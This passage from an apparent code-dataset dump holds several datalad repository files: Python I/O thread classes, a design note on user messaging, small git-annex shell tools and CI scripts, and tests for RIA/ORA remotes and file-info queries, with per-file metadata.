lgr.log(5, \"%s (%s) started\", self.identifier, self)\n\n # Copy data from source queue to destination queue\n # until exit is requested. If timeouts arise, signal\n # them to the receiver via the signal queue.\n data: Optional[bytes] = b\"\"\n while not self.exit_requested:\n\n data = self.read()\n # If the source sends None-data it wants\n # us to exit the thread. Signal this to\n # the downstream queues (which might or might\n # not be contain the output queue),\n # and exit the thread.\n if data is None:\n break\n\n if self.exit_requested:\n break\n\n succeeded = self.write(data)\n if not succeeded:\n break\n\n self.signal_event(IOState.ok, None)\n lgr.log(\n 5,\n \"%s (%s) exiting (exit_requested: %s, last data: %s)\",\n self.identifier,\n self,\n self.exit_requested, data)\n\n\nclass ReadThread(TransportThread):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]],\n user_info: Any,\n source: IO,\n destination_queue: Queue[tuple[Any, IOState, bytes]],\n length: int = COPY_BUFSIZE\n ) -> None:\n\n super().__init__(identifier, signal_queues, user_info)\n self.source = source\n self.destination_queue = destination_queue\n self.length = length\n\n def read(self) -> Optional[bytes]:\n try:\n data = os.read(self.source.fileno(), self.length)\n except (ValueError, OSError):\n # The destination was most likely closed, nevertheless,\n # try to close it and indicate EOF.\n _try_close(self.source)\n return None\n return data or None\n\n def write(self,\n data: bytes\n ) -> bool:\n\n # We write to an unlimited queue, no need for timeout checking.\n self.destination_queue.put((self.user_info, IOState.ok, data))\n return True\n\n\nclass WriteThread(TransportThread):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]],\n user_info: Any,\n source_queue: Queue[Optional[bytes]],\n destination: IO\n ) -> None:\n\n super().__init__(identifier, signal_queues, user_info)\n self.source_queue = source_queue\n self.destination = destination\n\n def read(self) -> Optional[bytes]:\n data = self.source_queue.get()\n if data is None:\n # Close stdin file descriptor here, since we know that no more\n # data will be sent to stdin.\n _try_close(self.destination)\n return data\n\n def write(self,\n data: bytes,\n ) -> bool:\n try:\n written = 0\n while written < len(data):\n written += os.write(\n self.destination.fileno(),\n data[written:])\n if self.exit_requested:\n return written == len(data)\n except (BrokenPipeError, OSError, ValueError):\n # The destination was most likely closed, nevertheless,\n # try to close it and indicate EOF.\n _try_close(self.destination)\n return False\n return True\n" }, { "alpha_fraction": 0.7488971948623657, "alphanum_fraction": 0.7697658538818359, "avg_line_length": 46.15999984741211, "blob_id": "45c86625701b49397391a61555edcd82a15234ac", "content_id": "eda104eaa60a1968a0a91736a1336e040895eca0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5894, "license_type": "permissive", "max_line_length": 143, "num_lines": 125, "path": "/docs/source/design/user_messaging.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_user_messaging:\n\n*******************************************************\nUser messaging: result records vs exceptions vs logging\n*******************************************************\n\n.. topic:: Specification scope and status\n\n This specification provides a partial overview of the implementation goal.\n\nMotivation\n==========\n\nThis specification delineates the applicable contexts for using\n:ref:`result records <chap_design_result_records>`, :ref:`exceptions <chap_design_exception_handling>`,\n:ref:`progress reporting <chap_design_progress_reporting>`, specific :ref:`log levels <chap_design_log_levels>`,\nor other types of user messaging processes.\n\n\nSpecification\n=============\n\nResult records\n--------------\n\n**Result records are the only return value format** for all DataLad interfaces.\n\nContrasting with classic Python interfaces that return specific non-annotated values,\nDataLad interfaces (i.e. subclasses of :py:class:`datalad.interface.base.Interface`)\nimplement message passing by yielding :ref:`result records <chap_design_result_records>`\nthat are associated with individual operations. Result records are routinely inspected throughout\nthe code base and their annotations are used to inform general program flow and error handling.\n\nDataLad interface calls can include an ``on_failure`` parameterization to specify how to\nproceed with a particular operation if a returned result record is\n:ref:`classified as a failure result <target-result-status>`. DataLad interface calls can\nalso include a ``result_renderer`` parameterization to explicitly enable or\ndisable the rendering of result records.\n\nDevelopers should be aware that external callers will use DataLad interface call parameterizations\nthat can selectively ignore or act on result records, and that the process should therefore\nyield meaningful result records. If, in turn, the process itself receives a set of result\nrecords from a sub-process, these should be inspected individually in order to identify result\nvalues that could require re-annotation or status re-classification.\n\nFor user messaging purposes, result records can also be enriched with additional human-readable\ninformation on the nature of the result, via the ``message`` key, and human-readable hints to\nthe user, via the ``hints`` key. Both of these are rendered via the `UI Module`_.\n\n\nException handling\n------------------\n\nIn general, **exceptions should be raised when there is no way to ignore or recover from\nthe offending action**.\n\nMore specifically, raise an exception when:\n\n1. A DataLad interface's parameter specifications are violated\n2. An additional requirement (beyond parameters) for the meaningful continuation of a\n DataLad interface, function, or process is not met\n\nIt must be made clear to the user/caller what the exact cause of the exception\nis, given the context within which the user/caller triggered the action.\nThis is achieved directly via a (re)raised exception, as opposed to logging messages or\nresults records which could be ignored or unseen by the user.\n\n.. note::\n In the case of a complex set of dependent actions it could be expensive to\n confirm parameter violations. In such cases, initial sub-routines might already generate\n result records that have to be inspected by the caller, and it could be practically better\n to yield a result record (with ``status=[error|impossible]``) to communicate the failure.\n It would then be up to the upstream caller to decide whether to specify\n ``on_failure='ignore'`` or whether to inspect individual result records and turn them\n into exceptions or not.\n\n\nLogging\n-------\n\nLogging provides developers with additional means to describe steps in a process,\nso as to **allow insight into the program flow during debugging** or analysis of e.g.\nusage patterns. Logging can be turned off externally, filtered, and redirected. Apart from\nthe :ref:`log-level <chap_design_log_levels>` and message, it is not inspectable and\ncannot be used to control the logic or flow of a program.\n\nImportantly, logging should not be the primary user messaging method for command outcomes,\nTherefore:\n\n1. No interface should rely solely on logging for user communication\n2. Use logging for in-progress user communication via the mechanism for :ref:`progress reporting <chap_design_progress_reporting>`\n3. Use logging to inform debugging processes\n\n\nUI Module\n---------\n\nThe :mod:`~datalad.ui` module provides the means to communicate information\nto the user in a user-interface-specific manner, e.g. via a console, dialog, or an iPython interface.\nInternally, all DataLad results processed by the result renderer are passed through the UI module.\n\nTherefore: unless the criteria for logging apply, and unless the message to be delivered to the user\nis specified via the ``message`` key of a result record, developers should let explicit user communication\nhappen through the UI module as it provides the flexibility to adjust to the present UI.\nSpecifically, :py:func:`datalad.ui.message` allows passing a simple message via the UI module.\n\n\nExamples\n========\n\nThe following links point to actual code implementations of the respective user\nmessaging methods:\n\n- `Result yielding`_\n- `Exception handling`_\n- `Logging`_\n- `UI messaging`_\n\n.. _Result yielding: https://github.com/datalad/datalad/blob/a8d7c63b763aacfbca15925bb1562a62b4448ea6/datalad/core/local/status.py#L402-L426\n.. _Exception handling: https://github.com/datalad/datalad/blob/a8d7c63b763aacfbca15925bb1562a62b4448ea6/datalad/core/local/status.py#L149-L150\n.. _Logging: https://github.com/datalad/datalad/blob/a8d7c63b763aacfbca15925bb1562a62b4448ea6/datalad/core/local/status.py#L158\n.. _UI messaging: https://github.com/datalad/datalad/blob/a8d7c63b763aacfbca15925bb1562a62b4448ea6/datalad/core/local/status.py#L438-L457" }, { "alpha_fraction": 0.6641094088554382, "alphanum_fraction": 0.674449622631073, "avg_line_length": 26.504587173461914, "blob_id": "93f8c0fc0f708136b607d2e85257d79b597eaa14", "content_id": "3efc01724ebfd29e22e3bc4e8d92f5ae4419fe3e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2998, "license_type": "permissive", "max_line_length": 89, "num_lines": 109, "path": "/tools/mimic_merges", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#emacs: -*- mode: shell-script; c-basic-offset: 4; tab-width: 4; indent-tabs-mode: t -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n#\n#\n# COPYRIGHT: Yaroslav Halchenko 2014\n#\n# LICENSE: MIT\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nset -eu\n\ndepth=5\n# precreate associative array with directory names\ndeclare -A dirs\ndirs[\"0\"]='.'\ndname=.\nfor d in `eval echo {1..$depth}`; do\n\techo $dname\n\tdname+=\"/d$d\"\n\tdirs[\"$d\"]=$dname\ndone\n\nfunction multi_branch {\n\tbranches=$1\n\tfiles_per_branch=$2\n annex=$3\n\techo \"Creating $branches branches with $files_per_branch per branch. annex=$annex\"\n\ti=0\n\tfor b in `eval echo {1..$branches}`; do\n\t\tgit co -b b$b master &> /dev/null\n\t\tfor f in `eval echo {1..$files_per_branch}`; do\n\t\t\t#echo -ne \"\\rFile $f\"\n\t\t\tfdepth=$(python -c \"print $i%$depth\")\n\t\t\tdname=${dirs[\"$fdepth\"]}\n\t\t\t#[ -e $dname ] || mkdir -p $dname\n\t\t\tfname=$dname/f$i.dat\n\t\t\techo \"file $i\" > $fname;\n\t\t\ti=$(($i+1))\n\t\tdone\n if [ $annex=1 ]; then\n git annex add * > /dev/null;\n else\n git add * > /dev/null\n fi\n\t\tgit commit -m \"commit in branch $b\" >/dev/null;\n\tdone\n\techo \"Merging\"\n\teval \"git merge -m 'merging $branches together' b{1..$branches}\" >/dev/null\n}\n\nfunction init_repo {\n\ttdir_=$1\n\tif [ -e $tdir_ ]; then\n\t\tchmod +w -R $tdir_\n\t\trm -r $tdir_ || :\n\tfi\n\tmkdir -p $tdir_\n\tcd $tdir_\n\tgit init\n\tgit annex init\n\ttouch .empty\n\tgit add .empty; git commit -m \"initial commit just to avoid dances with empty branches\"\n\t# precreate directories\n\tfor d in ${dirs[*]}; do\n\t\tmkdir -p $tdir_/$d\n\tdone\n}\n\nif [ $# -lt 2 ]; then\n\techo \"Usage: $0 nfiles_per_branch nbranches [tempdir]\"\n\texit 1\nfi\n\nfilespb=$1\nbr=$2\nfiles=$(python -c \"print $filespb*$br\")\n\nif [ $# -ge 3 ]; then\n\ttdir=$3\nelse\n\ttdir=/tmp/testdir\nfi\n\nannex=0\necho \"Temp path $tdir\"\ninit_repo $tdir/branches; cd $tdir/branches; time multi_branch $br $filespb $annex\ninit_repo $tdir/nobranches; cd $tdir/nobranches; time multi_branch 1 $files $annex\n\n#init_repo\n#time singe_branch\n" }, { "alpha_fraction": 0.6345177888870239, "alphanum_fraction": 0.6598984599113464, "avg_line_length": 16.81818199157715, "blob_id": "5a69ffcd9f21bd6264f9697664497ba47c5dfca5", "content_id": "b6ab9cf7be778b5a311675deaaed735c548f12c6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 197, "license_type": "permissive", "max_line_length": 62, "num_lines": 11, "path": "/tools/bisect-git-annex.scripts/bisect-git-annex-lock.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\nerr=\"thread blocked indefinitely\"\n\ncd ~/QA\ntimeout 5 git annex get -J2 sub-* 2>&1 | tee annex-get-log.txt\nif grep -q \"$err\" annex-get-log.txt; then\n\techo \"E: $err\"\n\texit 1\nfi\n\n" }, { "alpha_fraction": 0.7104895114898682, "alphanum_fraction": 0.7174825072288513, "avg_line_length": 36.6315803527832, "blob_id": "92201b783c024544d73cce186aaa66b029e05d61", "content_id": "942d61603f4545a9ee5ef759937504981a95c445", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 715, "license_type": "permissive", "max_line_length": 151, "num_lines": 19, "path": "/tools/ci/prep-travis-devel-annex.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e -u\n\n# configure\nsed -e 's,/debian ,/debian-devel ,g' /etc/apt/sources.list.d/neurodebian.sources.list | sudo tee /etc/apt/sources.list.d/neurodebian-devel.sources.list\nsudo apt-get update\n\n# check versions\n# devel:\ndevel_annex_version=$(apt-cache policy git-annex-standalone | grep -B1 '/debian-devel ' | awk '/ndall/{print $1;}')\ncurrent_annex_version=$(apt-cache policy git-annex-standalone | awk '/\\*\\*\\*/{print $2}')\n\nif dpkg --compare-versions \"$devel_annex_version\" gt \"$current_annex_version\"; then\n sudo apt-get install \"git-annex-standalone=$devel_annex_version\"\nelse\n echo \"I: devel version $devel_annex_version is not newer than installed $current_annex_version\"\n exit 99\nfi\n" }, { "alpha_fraction": 0.5920093655586243, "alphanum_fraction": 0.5984733700752258, "avg_line_length": 40.430198669433594, "blob_id": "768b165271f273d9795dfbb2134d50b2eb4683d8", "content_id": "f2c04d794272d37ceae4f56d093eacd0164721c0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14542, "license_type": "permissive", "max_line_length": 122, "num_lines": 351, "path": "/datalad/distributed/tests/test_ria_git_remote.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\n\nimport subprocess\n\nfrom datalad.api import (\n Dataset,\n clone,\n)\nfrom datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n)\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n SSHRemoteIO,\n)\nfrom datalad.distributed.tests.ria_utils import (\n common_init_opts,\n populate_dataset,\n)\nfrom datalad.interface.results import annexjson2result\nfrom datalad.tests.utils_pytest import (\n assert_result_count,\n assert_status,\n eq_,\n known_failure_windows,\n skip_ssh,\n slow,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n quote_cmdlinearg,\n)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile()\n@with_tempfile(mkdir=True)\ndef _test_bare_git_version_1(host, dspath, store):\n # This test should take a dataset and create a bare repository at the remote\n # end from it.\n # Given, that it is placed correctly within a tree of dataset, that remote\n # thing should then be usable as an ora-remote as well as as a git-type\n # remote.\n # Note: Usability of git remote by annex depends on dataset layout version\n # (dirhashlower vs. -mixed).\n # For version 1 (lower) upload and consumption should be\n # interchangeable. It doesn't matter which remote is used for what\n # direction.\n ds_path = Path(dspath)\n store = Path(store)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n bare_repo_path, _, objdir = get_layout_locations(1, store, ds.id)\n # Use git to make sure the remote end is what git thinks a bare clone of it\n # should look like\n subprocess.run(['git', 'clone', '--bare',\n quote_cmdlinearg(str(dspath)),\n quote_cmdlinearg(str(bare_repo_path))\n ])\n\n if host:\n url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n url = \"ria+{}\".format(store.as_uri())\n init_opts = common_init_opts + ['url={}'.format(url)]\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n create_store(io, store, '1')\n # set up the dataset location, too.\n # Note: Dataset layout version 1 (dirhash lower):\n create_ds_in_store(io, store, ds.id, '1', '1', init_obj_tree=False)\n\n # Now, let's have the bare repo as a git remote and use it with annex\n git_url = \"ssh://{host}{path}\".format(host=host, path=bare_repo_path) \\\n if host else bare_repo_path.as_uri()\n ds.repo.add_remote('bare-git', git_url)\n ds.repo.enable_remote('bare-git')\n\n # copy files to the remote\n ds.push('.', to='bare-git')\n eq_(len(ds.repo.whereis('one.txt')), 2)\n\n # now we can drop all content locally, reobtain it, and survive an\n # fsck\n ds.drop('.')\n ds.get('.')\n assert_status('ok', [annexjson2result(r, ds) for r in ds.repo.fsck()])\n\n # Now, add the ora remote:\n ds.repo.init_remote('ora-remote', options=init_opts)\n # fsck to make availability known\n assert_status(\n 'ok',\n [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='ora-remote', fast=True)])\n eq_(len(ds.repo.whereis('one.txt')), 3)\n\n # Now move content from git-remote to local and see it not being available\n # via bare-git anymore.\n ds.repo.call_annex(['move', '--all', '--from=bare-git'])\n # ora-remote doesn't know yet:\n eq_(len(ds.repo.whereis('one.txt')), 2)\n\n # But after fsck it does:\n fsck_res = [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='ora-remote', fast=True)]\n assert_result_count(fsck_res,\n 1,\n status='error',\n error_message='** Based on the location log, one.txt\\n'\n '** was expected to be present, '\n 'but its content is missing.')\n assert_result_count(fsck_res,\n 1,\n status='error',\n error_message='** Based on the location log, subdir/two\\n'\n '** was expected to be present, '\n 'but its content is missing.')\n eq_(len(ds.repo.whereis('one.txt')), 1)\n # and the other way around: upload via ora-remote and have it available via\n # git-remote:\n ds.push('.', to='ora-remote')\n # fsck to make availability known\n assert_status(\n 'ok',\n [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='bare-git', fast=True)])\n eq_(len(ds.repo.whereis('one.txt')), 3)\n\n\n@slow # 12sec + ? on travis\ndef test_bare_git_version_1():\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_bare_git_version_1))('datalad-test')\n _test_bare_git_version_1(None)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile()\n@with_tempfile(mkdir=True)\ndef _test_bare_git_version_2(host, dspath, store):\n # Similarly to test_bare_git_version_1, this should ensure a bare git repo\n # at the store location for a dataset doesn't conflict with the ORA remote.\n # Note: Usability of git remote by annex depends on dataset layout version\n # (dirhashlower vs. -mixed).\n # For version 2 (mixed) upload via ORA and consumption via git should\n # work. But not the other way around, since git-annex uses\n # dirhashlower with bare repos.\n\n ds_path = Path(dspath)\n store = Path(store)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n bare_repo_path, _, objdir = get_layout_locations(1, store, ds.id)\n # Use git to make sure the remote end is what git thinks a bare clone of it\n # should look like\n subprocess.run(['git', 'clone', '--bare',\n quote_cmdlinearg(str(dspath)),\n quote_cmdlinearg(str(bare_repo_path))\n ])\n\n if host:\n url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n url = \"ria+{}\".format(store.as_uri())\n init_opts = common_init_opts + ['url={}'.format(url)]\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n create_store(io, store, '1')\n # set up the dataset location, too.\n # Note: Dataset layout version 2 (dirhash mixed):\n create_ds_in_store(io, store, ds.id, '2', '1')\n # Avoid triggering a git-annex safety check. See gh-5253.\n assert objdir.is_absolute()\n io.remove_dir(objdir)\n\n # Now, let's have the bare repo as a git remote\n git_url = \"ssh://{host}{path}\".format(host=host, path=bare_repo_path) \\\n if host else bare_repo_path.as_uri()\n ds.repo.add_remote('bare-git', git_url)\n ds.repo.enable_remote('bare-git')\n # and the ORA remote in addition:\n ds.repo.init_remote('ora-remote', options=init_opts)\n # upload keys via ORA:\n ds.push('.', to='ora-remote')\n # bare-git doesn't know yet:\n eq_(len(ds.repo.whereis('one.txt')), 2)\n # fsck to make availability known\n assert_status(\n 'ok',\n [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='bare-git', fast=True)])\n eq_(len(ds.repo.whereis('one.txt')), 3)\n ds.drop('.')\n eq_(len(ds.repo.whereis('one.txt')), 2)\n # actually consumable via git remote:\n ds.repo.call_annex(['move', 'one.txt', '--from', 'bare-git'])\n eq_(len(ds.repo.whereis('one.txt')), 2)\n # now, move back via git - shouldn't be consumable via ORA\n ds.repo.call_annex(['move', 'one.txt', '--to', 'bare-git'])\n # fsck to make availability known, but there's nothing from POV of ORA:\n fsck_res = [annexjson2result(r, ds)\n for r in ds.repo.fsck(remote='ora-remote', fast=True)]\n assert_result_count(fsck_res,\n 1,\n status='error',\n error_message='** Based on the location log, one.txt\\n'\n '** was expected to be present, '\n 'but its content is missing.')\n assert_result_count(fsck_res, 3, status='ok')\n eq_(len(fsck_res), 4)\n eq_(len(ds.repo.whereis('one.txt')), 1)\n\n\n@slow # 13sec + ? on travis\ndef test_bare_git_version_2():\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_bare_git_version_2))('datalad-test')\n _test_bare_git_version_2(None)\n\n# TODO: Outcommented \"old\" test from git-annex-ria-remote. This one needs to be\n# revisited after RF'ing to base ORA on proper command abstractions for\n# remote execution\n\n# @skip_if_on_windows\n# @with_tempfile\n# @with_tempfile(mkdir=True)\n# @serve_path_via_http\n# @with_tempfile\n# @with_tempfile\n# @with_tempfile(mkdir=True)\n# def test_create_as_bare(origin=None, remote_base_path=None, remote_base_url=None, public=None,\n# consumer=None, tmp_location=None):\n#\n# # Note/TODO: Do we need things like:\n# # git config receive.denyCurrentBranch updateInstead\n# # mv .hooks/post-update.sample hooks/post-update\n# # git update-server-info\n#\n# # Test how we build a riaremote from an existing dataset, that is a bare git repo and can be accessed as a git type\n# # remote as well. This should basically outline how to publish to that kind of structure as a data store, that is\n# # autoenabled, so we can publish to github/gitlab and make that storage known.\n#\n# remote_base_path = Path(remote_base_path)\n#\n# ds = create(origin)\n# populate_dataset(ds)\n# assert_repo_status(ds.path)\n#\n# # add the ria remote:\n# # Note: For serve_path_via_http to work (which we need later), the directory needs to already exist.\n# # But by default ORARemote will reject to create the remote structure in an already existing directory,\n# # that wasn't created by itself (lacks as ria-layout-version file).\n# # So, we can either configure force-write here or put a version file in it beforehand.\n# # However, this is specific to the test environment!\n# with open(str(remote_base_path / 'ria-layout-version'), 'w') as f:\n# f.write('1')\n# initexternalremote(ds.repo, 'riaremote', 'ora', config={'base-path': str(remote_base_path)})\n# # pretty much any annex command that talks to that remote should now trigger the actual creation on the remote end:\n# assert_status(\n# 'ok',\n# [annexjson2result(r, ds)\n# for r in ds.repo.fsck(remote='riaremote', fast=True)])\n#\n# remote_dataset_path = remote_base_path / ds.id[:3] / ds.id[3:]\n#\n# assert remote_base_path.exists()\n# assert remote_dataset_path.exists()\n# ds.push('.', to='riaremote')\n#\n# # Now, let's make the remote end a valid, bare git repository\n# eq_(subprocess.run(['git', 'init', '--bare'], cwd=str(remote_dataset_path)).returncode,\n# 0)\n#\n# #subprocess.run(['mv', 'hooks/post-update.sample', 'hooks/post-update'], cwd=remote_dataset_path)\n# #subprocess.run(['git', 'update-server-info'], cwd=remote_dataset_path)\n#\n# # TODO: we might need \"mv .hooks/post-update.sample hooks/post-update\", \"git update-server-info\" as well\n# # add as git remote and push everything\n# eq_(subprocess.run(['git', 'remote', 'add', 'bare-git', str(remote_dataset_path)], cwd=origin).returncode,\n# 0)\n# # Note: \"--mirror\" does the job for this test, while it might not be a good default some kind of\n# # datalad-create-sibling. However those things need to be configurable for actual publish/creation routine anyway\n# eq_(subprocess.run(['git', 'push', '--mirror', 'bare-git'], cwd=origin).returncode,\n# 0)\n#\n# # annex doesn't know the bare-git remote yet:\n# eq_(len(ds.repo.whereis('one.txt')), 2)\n# # But after enableremote and a fsck it does:\n# eq_(subprocess.run(['git', 'annex', 'enableremote', 'bare-git'], cwd=origin).returncode,\n# 0)\n# assert_status(\n# 'ok',\n# [annexjson2result(r, ds)\n# for r in ds.repo.fsck(remote='bare-git', fast=True)])\n# eq_(len(ds.repo.whereis('one.txt')), 3)\n#\n# # we can drop and get again via 'bare-git' remote:\n# ds.drop('.')\n# eq_(len(ds.repo.whereis('one.txt')), 2)\n# eq_(subprocess.run(['git', 'annex', 'get', 'one.txt', '--from', 'bare-git'], cwd=origin).returncode,\n# 0)\n# eq_(len(ds.repo.whereis('one.txt')), 3)\n# # let's get the other one from riaremote\n# eq_(len(ds.repo.whereis(op.join('subdir', 'two'))), 2)\n# eq_(subprocess.run(['git', 'annex', 'get', op.join('subdir', 'two'), '--from', 'riaremote'], cwd=origin).returncode,\n# 0)\n# eq_(len(ds.repo.whereis(op.join('subdir', 'two'))), 3)\n#\n# raise SkipTest(\"NOT YET DONE\")\n# # TODO: Part below still doesn't work. \"'storage' is not available\" when trying to copy to it. May be the HTTP\n# # Server is not available from within the context of the git-type special remote? Either way, still smells like an\n# # issue with the f****** test setup.\n#\n#\n#\n# # Now, let's try make it a data store for datasets available from elsewhere (like github or gitlab):\n# # For this test, we need a second git remote pointing to remote_dataset_path, but via HTTP.\n# # This is because annex-initremote for a git-type special remote requires a git remote pointing to the same location\n# # and it fails to match local paths. Also doesn't work with file:// scheme.\n# #\n# # TODO: Figure it out in detail. That issue is either a bug or not \"real\".\n# #\n# # ds.repo._allow_local_urls()\n# # dataset_url = remote_base_url + ds.id[:3] + '/' + ds.id[3:] + '/'\n# # eq_(subprocess.run(['git', 'remote', 'add', 'datasrc', dataset_url],\n# # cwd=origin).returncode,\n# # 0)\n# # eq_(subprocess.run(['git', 'annex', 'initremote', 'storage', 'type=git',\n# # 'location={}'.format(dataset_url), 'autoenable=true'],\n# # cwd=origin).returncode,\n# # 0)\n# # assert_status(\n# # 'ok',\n# # [annexjson2result(r, ds)\n# # for r in fsck(ds.repo, remote='storage', fast=True)])\n" }, { "alpha_fraction": 0.6054096817970276, "alphanum_fraction": 0.6075311303138733, "avg_line_length": 37.479591369628906, "blob_id": "bbe1685ed58288a093751b23257e12c19b17292d", "content_id": "739130044659bfec5aeec09d50877c0c68d4b95b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15084, "license_type": "permissive", "max_line_length": 92, "num_lines": 392, "path": "/datalad/support/tests/test_fileinfo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test file info getters\"\"\"\n\n\nimport os.path as op\nfrom pathlib import Path\n\nimport datalad.utils as ut\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import NoSuchPathError\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n assert_dict_equal,\n assert_equal,\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n get_annexstatus,\n get_convoluted_situation,\n known_failure_githubci_win,\n on_nfs,\n on_travis,\n slow,\n skip_if,\n with_tempfile,\n with_tree,\n)\n\n\n@slow # 10sec on travis\n@known_failure_githubci_win\n@with_tempfile\ndef test_get_content_info(path=None):\n repo = GitRepo(path)\n assert_equal(repo.get_content_info(), {})\n # an invalid reference causes an exception\n assert_raises(ValueError, repo.get_content_info, ref='HEAD')\n\n ds = get_convoluted_situation(path)\n repopath = ds.repo.pathobj\n\n assert_equal(ds.repo.pathobj, repopath)\n assert_equal(ds.pathobj, ut.Path(path))\n\n # verify general rules on fused info records that are incrementally\n # assembled: for git content info, amended with annex info on 'HEAD'\n # (to get the last committed stage and with it possibly vanished\n # content), and lastly annex info wrt to the present worktree, to\n # also get info on added/staged content\n # this fuses the info reported from\n # - git ls-files\n # - git annex findref HEAD\n # - git annex find --include '*'\n for f, r in get_annexstatus(ds.repo).items():\n if f.match('*_untracked'):\n assert(r.get('gitshasum', None) is None)\n if f.match('*_deleted'):\n assert(not f.exists() and not f.is_symlink() is None)\n if f.match('subds_*'):\n assert(r['type'] == 'dataset' if r.get('gitshasum', None) else 'directory')\n if f.match('file_*'):\n # which one exactly depends on many things\n assert_in(r['type'], ('file', 'symlink'))\n if f.match('file_ingit*'):\n assert(r['type'] == 'file')\n elif '.datalad' not in f.parts and not f.match('.git*') and \\\n r.get('gitshasum', None) and not f.match('subds*'):\n # this should be known to annex, one way or another\n # regardless of whether things add deleted or staged\n # or anything in between\n assert_in('key', r, f)\n assert_in('keyname', r, f)\n assert_in('backend', r, f)\n assert_in('bytesize', r, f)\n # no duplication with path\n assert_not_in('file', r, f)\n\n # query full untracked report\n res = ds.repo.get_content_info()\n assert_in(repopath.joinpath('dir_untracked', 'file_untracked'), res)\n assert_not_in(repopath.joinpath('dir_untracked'), res)\n # query for compact untracked report\n res = ds.repo.get_content_info(untracked='normal')\n assert_not_in(repopath.joinpath('dir_untracked', 'file_untracked'), res)\n assert_in(repopath.joinpath('dir_untracked'), res)\n # query no untracked report\n res = ds.repo.get_content_info(untracked='no')\n assert_not_in(repopath.joinpath('dir_untracked', 'file_untracked'), res)\n assert_not_in(repopath.joinpath('dir_untracked'), res)\n\n # git status integrity\n status = ds.repo.status()\n for t in ('subds', 'file'):\n for s in ('untracked', 'added', 'deleted', 'clean',\n 'ingit_clean', 'dropped_clean', 'modified',\n 'ingit_modified'):\n for l in ('', ut.PurePosixPath('subdir', '')):\n if t == 'subds' and 'ingit' in s or 'dropped' in s:\n # invalid combination\n continue\n if t == 'subds' and s == 'deleted':\n # same as subds_unavailable -> clean\n continue\n p = repopath.joinpath(l, '{}_{}'.format(t, s))\n assert p.match('*_{}'.format(status[p]['state'])), p\n if t == 'subds':\n 